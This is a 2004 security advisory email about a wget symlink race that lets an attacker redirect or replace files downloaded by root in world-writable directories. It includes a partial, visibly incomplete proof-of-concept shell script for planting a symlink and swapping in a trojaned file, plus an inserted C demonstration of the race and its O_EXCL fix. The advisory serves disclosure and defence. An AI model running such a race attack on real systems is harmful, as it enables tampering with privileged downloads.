[UNIX] Wget Race Condition Vulnerability Allows a Symlink Attack
From: SecuriTeam (support_at_securiteam.com)
To: firstname.lastname@example.org
Date: 18 May 2004 19:05:50 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Wget Race Condition Vulnerability Allows a Symlink Attack
" <http://www.gnu.org/directory/wget.html> Wget is a network utility to
retrieve files from the Web using http and ftp, the two most widely used
Internet protocols. It works non-interactively, so it will work in the
background, after having logged off. The program supports recursive
retrieval of web-authoring pages as well as ftp sites; you can use wget to
make mirrors of archives and home pages or to travel the Web like a WWW
It is possible to create a symbolic link attack on wget when retrieving
files, which will result in a file written in a completely different
location than intended.
* Wget versions 1.9, 1.9.1, possibly prior
Wget checks for the presence of a file with the same name as the one
invoked at the command line. If the file exists, it saves the downloaded
file under a different name. The problem stems from not locking the file
prior to writing to it, which allows an attacker to create a symbolic link
from the file to another file before wget writes to it, thereby diverting
the output anywhere desired (in world-writable directories, naturally).
An example of an attack sequence:
* Wget process starts
* File checking (but not locking!)
* Attacker creates a symlink
* Wget writes to the wrong place
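
The check-then-write gap in the sequence above, shown next to an atomic exclusive create. This is an added example, not wget's code and not part of the original advisory; the names victim_clobbered, RACY_FLAGS and SAFE_FLAGS and the temporary file names are hypothetical, and the symlink is constructed inside a private temporary directory.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Flags for the second half of a check-then-open sequence: by the time this
   open() runs, the earlier existence test no longer says anything. */
#define RACY_FLAGS (O_WRONLY | O_CREAT | O_TRUNC)
/* Test and create as one kernel operation: fails with EEXIST if the name
   exists in any form, including a symlink (which is not followed). */
#define SAFE_FLAGS (O_WRONLY | O_CREAT | O_EXCL)

/* Constructed scenario in a private temp dir: the output name "download"
   has become a symlink to "victim" after the existence test passed.
   Returns 1 if writing through `flags` altered victim, 0 if not, -1 on
   setup failure. */
int victim_clobbered(int flags) {
    char dir[] = "/tmp/wgetdemoXXXXXX", victim[64], name[64], buf[8] = {0};
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(name, sizeof name, "%s/download", dir);
    int fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "keep", 4) != 4) return -1;
    close(fd);
    if (symlink(victim, name) != 0) return -1;

    fd = open(name, flags, 0600);          /* the downloader's open */
    if (fd >= 0) {
        if (write(fd, "data", 4) != 4) perror("write");
        close(fd);
    } else {
        fprintf(stderr, "open refused: %s\n", strerror(errno));
    }

    fd = open(victim, O_RDONLY);
    ssize_t n = fd >= 0 ? read(fd, buf, sizeof buf - 1) : -1;
    if (fd >= 0) close(fd);
    unlink(name); unlink(victim); rmdir(dir);
    return !(n == 4 && strcmp(buf, "keep") == 0);
}

int main(void) {
    printf("check-then-open clobbers target: %d\n", victim_clobbered(RACY_FLAGS));
    printf("O_CREAT|O_EXCL clobbers target:  %d\n", victim_clobbered(SAFE_FLAGS));
    return 0;
}
```

When the exclusive open fails with EEXIST, the caller should pick a new name and retry the same exclusive open rather than fall back to a separate existence test.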
A proof-of-concept script is provided that can be used in the following
* Open a shell and execute wget_race.sh with user A
* Open another shell and with root user launch wget from /tmp:
* Check the content of /tmp/patch-2.4.26.bz2
rm -f salida.txt pid.txt *.wget /tmp/patch-2.4.26.bz2
echo "Waiting for Wget execution..."
while [ "$a" == 1 ]
ps auxw|grep wget|grep patch-2.4.26.bz2>>salida.txt
echo "Process catched!"
pgrep -u root wget>pid.txt
ln -s /dev/null /tmp/patch-2.4.26.bz2
echo "/dev/null link created!"
echo "Waiting for downloading to finish..."
b=`pgrep -u root wget`
while [ "$c" == 1 ]
if [ -e .wget ]
echo "Downloading finished! Let's delete the original file, and put
our trojaned file :-)"
rm -f /tmp/patch-2.4.26.bz2
echo "Does it worked "
ls -la /tmp/patch-2.4.26.bz2
b=`pgrep -u root wget`
The information has been provided by
<mailto:email@example.com> Hugo Vázquez Caramés.